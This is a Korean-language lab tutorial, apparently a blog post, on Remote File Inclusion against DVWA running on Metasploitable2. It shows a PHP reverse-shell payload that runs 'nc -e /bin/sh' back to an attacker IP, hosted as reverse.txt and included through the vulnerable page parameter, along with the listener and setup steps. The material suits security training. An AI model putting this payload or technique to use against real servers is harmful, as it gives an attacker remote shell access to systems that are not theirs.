RFI(Remote File Inclusion)

공격자가 악성 스크립트를 웹서버에 전달해서 해당 페이지를 통해서 악성코드를 실행하는 공격 방법

 

php.ini의 allow_url_include On //이상태에서만 공격이 가능. 현재는 기본값이 OFF라 사용하기 힘듦.

 

[Metasploitable2]

 

1. vi /etc/php5/cgi/php.ini에서

allow_url_include를 On으로 변경 //공격을위해 변경.

Off값을 아래와같이 On으로 변경

2. /etc/init.d/apache2 restart //설정 저장을 위해 재시작

 

3. 공격자 시스템에서 httpd를 구현

cd /var/www/html

vi reverse.txt 

<?php passthru("nc -e /bin/sh 192.168.232.100 8888"); ?>

 

4. 공격자 시스템에서 httpd 시작

systemctl start apache2

5. 검증

http://localhost/reverse.txt 를 url에 입력

6. 포트 8888 열기

nc -vvlp 8888

 

7. admin/password 로그인

 

8. Security lever low로 변경

 

9. file inclution 클릭

http://meta/dvwa/vulnerabilities/fi/?page=include.php

include.php 대신 http://192.168.232.100/reverse.txt를 입력

 

10. reverse.txt파일이 실행되어 원격접속이 된 것을 확인.

 

'Web Security' 카테고리의 다른 글

crunch [사전파일생성]  (0) 2019.04.02
XSS(Cross Site Scripting) ,Session hijacking(BeEF)  (0) 2019.03.29
LFI(Local File Inclusion)  (0) 2019.03.26
정보수집(maltego와 dirb스캐닝)  (0) 2019.03.25
http  (0) 2019.03.25

+ Recent posts